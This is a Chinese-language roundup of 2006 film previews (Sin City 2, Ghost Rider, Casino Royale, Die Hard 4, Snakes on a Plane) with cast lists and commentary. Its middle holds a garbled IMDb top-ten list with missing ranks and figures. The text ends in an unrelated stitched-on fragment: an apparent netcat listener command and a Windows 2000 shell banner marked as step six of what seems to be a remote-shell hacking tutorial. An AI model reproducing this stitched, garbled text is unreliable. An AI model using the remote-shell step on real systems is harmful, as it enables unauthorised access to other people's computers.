看过《罪恶之城》这部电影的人,一定对那个黑白的世界记忆尤深。在那个虚构的城市:罪恶之城中,警察已经被黑帮所腐化。在2006年夏季,《罪恶之城2》又将上市了,新片将延续《罪恶之城》的黑白色调风格,情节亦由多个小故事组成,让我们拭目以待
29. 《恶灵骑士》Ghost Rider
上映日期:2006年7月14日
主演:尼古拉斯.凯奇 伊娃.曼德丝
导演:马克.斯蒂文.约翰森
类型:动作/幻想/冒险
发行公司:哥伦比亚影业
尼古拉斯.凯奇本就是一位有名的漫画迷,这次他终于出演漫画英雄的角色了。《恶灵骑士》根据Marvel公司出品的畅销漫画改编,一名摩托车特技表演者强尼(尼古拉斯.凯奇饰,要像小伙子那样骑着摩托车对他也是一种挑战呀,但从剧照来看,他还是演得像模像样的),愿意出卖自己的灵魂换取挚爱的性命,从此他被诅咒在夜晚变身成为邪灵附身的恶魔,骑着闪耀地狱之火的摩托车横行街头
《皇家赌场》Casino Royale
上映日期:2006年11月17日
主演:丹尼尔.克雷格 朱迪.丹奇
导演:马丁.坎贝尔
类型:动作/冒险/剧情
发行公司:米高梅/哥伦比亚
英国小生丹尼尔.克雷格脱颖而出,成为第21部007影片——《皇家赌场》的不朽特工詹姆斯.邦德的扮演者(个人觉得这位演员好像过于老成)。而独具野性魅力的安吉莉娜.朱丽极有可能获选克雷格第一个邦女郎的身份。这部电影的导演是曾经执导过《黄金眼》和《佐罗传奇》的马丁.坎贝尔,他透露这部电影“将要讲述邦德事业开始的故事。邦德如何得到“007”的编号,如何得到阿斯顿.马丁跑车及如何调制马蒂尼酒的
31.片 名:虎胆龙威4 / 英文:Die Hard 4
主 演:布鲁斯.威利斯(Bruce Willis)
类 型:动作(Action)惊悚(Thriller)
国家地区:美国
发行公司:福克斯(20th Century Fox)
首映日期:2006年12月31日
《虎胆龙威》已经成了美国人心目中的动作经典。影片中的布鲁斯?威利斯更是凭借该片一跃成为一线男星。但是现在,人气小天王贾斯汀?汀布莱克有望取代威利斯,凭借最新的《虎胆龙威4》登上新一代动作巨星的位置。.《神拳无敌》.《血色白桦》.《机动暗战》.《国王与小鸟》 据称,在这部《虎胆龙威4》中,故事将发生在上一集的18年后,贾斯汀有望扮演约翰?迈克莱恩(布鲁斯?威利斯扮演)的儿子———小约翰?迈克莱恩。他将和自己的父亲一同出生入死,惩恶除奸。对于此片,福克斯公司和威利斯都抱有极大的希望。威利斯也已经亲口承认了影片开拍的消息。他说:“《虎胆龙威4》剧本现在正在紧张的撰写中,该片将在今年秋天在美国东海岸开拍。影片的时间被设定在我退休之后,而我正在力邀贾斯汀扮演我的儿子。你知道,当爸爸这种感觉应该不错。” 前“超级男孩”主唱,近年来人气有所下滑的贾斯汀?汀布莱克急需维持自己的人气,所以除了和卡梅隆?迪亚兹的感情成为人们注目的焦点外,他也开始涉足电影的表演。此前,他银幕处女作《爱迪生》已经杀青,他在片中扮演一个手无缚鸡之力的记者,无意间揭发美国政府高层官员的贪污内幕遭遇追杀。 20世纪福克斯公司一直把《虎胆龙威》系列当作该公司的一块金字招牌,所以在十年前《虎胆龙威3》拍完以后,一直没有继续拍下去。不过近来布鲁斯?威利斯再次凭借《整十码》等影片在好莱坞频频亮相,再加上贾斯汀的加盟,相信这部《虎胆龙威4》将成为新动作片中的翘楚。
《阿甘正传》
黑客帝国系1. 9.1 教父 The Godfather (1972) 150,035
肖申克的救赎 The Shawshank Redemption (1994) 1
教父2 The Godfather: Part II (1974) 85,987
指环王之国王归来 The Lord of the Rings: The Return of the King
(2003) 135,288
七武士 Shichinin no samurai (1954)
辛德勒名单 Schindler's List (1993) 113,953
卡萨布兰卡 Casablanca (1942) 76,900
8. 8.7 低俗小说 Pulp Fiction (1994) 159,751
9. 8.7 星球大战 Star Wars (1977) 158,487
10. 8.7 星球大战2帝国反击战 Star Wars: Episode V - The Empire Strikes Back (1980) 123,828
谁知道这部电影叫什么名字?
◆中文片名:飞机上有蛇/空中蛇灾/航班蛇患
◆英文片名:Snakes on a Plane
◆导 演:大卫·艾理斯 David R. Ellis
◆编 剧:John Heffernan
Sebastian Gutierrez
◆主 演:塞缪尔·杰克逊 Samuel L. Jackson ....Nelville Flynn
朱丽安娜·麦吉利斯 Julianna Margulies ....
雷切尔·布兰切特 Rachel Blanchard ....
林·沙烨 Lin Shaye .... Grace
Flex Alexander ....
Adam Behr .... Puppeteer
Bobby Cannavale .... Hank Harris
Terry Chen .... Chen Leong
Keith Dallas .... Big Leroy
Casey Dubois .... Curtis
埃姆雷·哈尔梅斯 Emily Holmes .... Ashley
Mark Houghton .... John Saunders
大卫·科恩查内 David Koechner .... Rick
Byron Lawson .... Eddie Kim
托德·路易斯 Todd Louiso .... Price
◆类 型:冒险/惊悚/动作
◆级 别:美国:R
◆国 别:美国
◆出品年份:2006
◆IMDB链接:
◆IMDB评分:6.9/10 (32,976 votes)
影片简介
剧情:
联邦密探尼维利·费恩又承担了一项重要的任务,那就是保护一名年轻人。这名年轻人目睹了黑帮暴徒的杀人暴行,并且愿意出庭作证。为了确保证人能够安全地从夏威夷到达洛杉矶,尼维利·费恩预备声东击西,先用一架私人飞机作饵,以迷惑穷追猛打想要杀人灭口的黑帮老大。
与此同时,他偷偷地把证人安排上了一架普通的商务飞机,预备不声不响地将他送至洛杉矶。但是,一名在机场工作的内鬼,将整个计划泄露予了黑帮老大。只要阻止证人乘搭的飞机登陆洛杉机,或是确保证人不能活生生的步出机舱,黑帮老大便能成功逃过法网。为此他想出一条妙计,就是引蛇入机。一名杀手携带着装满毒蛇的柳条箱登上了这架商务飞机,在飞机起飞后,他放出了上百条毒蛇游走于这个上万英尺高的密闭空间内。尼维利·费恩将如何联合菜鸟飞行员,以及早已吓得魂不附体的乘务员和乘客们,成功逃脱毒蛇的纠缠呢?
阵容:
导演大卫·埃里斯在好莱坞也混迹多年,算是老牌导演一个了。由他独立导演的影片虽然只有《死神来了2》等寥寥几部,但评价一直不错。更值得一提的是,他担任副导演的大片简直令人乍舌,像《黑客帝国2》、《哈里·波特》和《完美风暴》等,虽然只是副职,但足够练就丰富的经验和对大小场面的控制力,就如深藏不露的武林高手,苦心练功只为了抓住机会的爆发。
回想一下《死神来了2》中对情节连贯性的把握和对气氛的营造,大卫·埃里斯在恐怖片上的造诣还是让人有一定信心的。而《低俗小说》中的黑人性格演员塞缪尔·L·杰克逊,早在1996年暑假大卖的《杀戮时刻》中把那位绝望的父亲表现得入木三分,从此其貌不扬的他也因此跨入了超级明星之列。其实在这部恐怖片里,蛇才是真正的主角,不过,相信塞缪尔·L·杰克逊的演技也能助导演的一臂之力,使得本片在暑期档的激烈争夺中能够苟延残喘,争取收回成本,有所赢利。
幕后:
惊悚片,又是惊悚片!2006上半年,好莱坞的惊悚片几乎占去半壁江山,题材更是五花八门,妖魔鬼怪各显神通,想要从身经百“吓”的观众手中再赚取惊叫和票房简直比登天还难。想到以蛇为主题的恐怖片,首先跃入脑海的是当年的《狂蟒之灾》,不过该片较为拙劣的特技和有名的票房毒药詹妮弗·洛佩兹的加盟,使得票房疲软不堪。
这一次导演为了达到惊悚的效果,把几百条毒蛇安排进了飞机这样的一个处在高空,根本无处可逃的密闭空间内。人和毒蛇除去正面对决之外,没有其他办法。这样的安排看上去比较有新意,其实稍显弱智。以如今各国在恐怖袭击如临大敌的气氛下,对机场安全的严密监控,根本不太可能让一整箱毒蛇顺利登机。如果导演再不能很好地设置悬念,营造恐怖气氛,给大家一点耳目一新之感,恐怕新片出炉也难逃恶评如潮的结局。
tnc -lp 123 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. 第六步: 现在你就可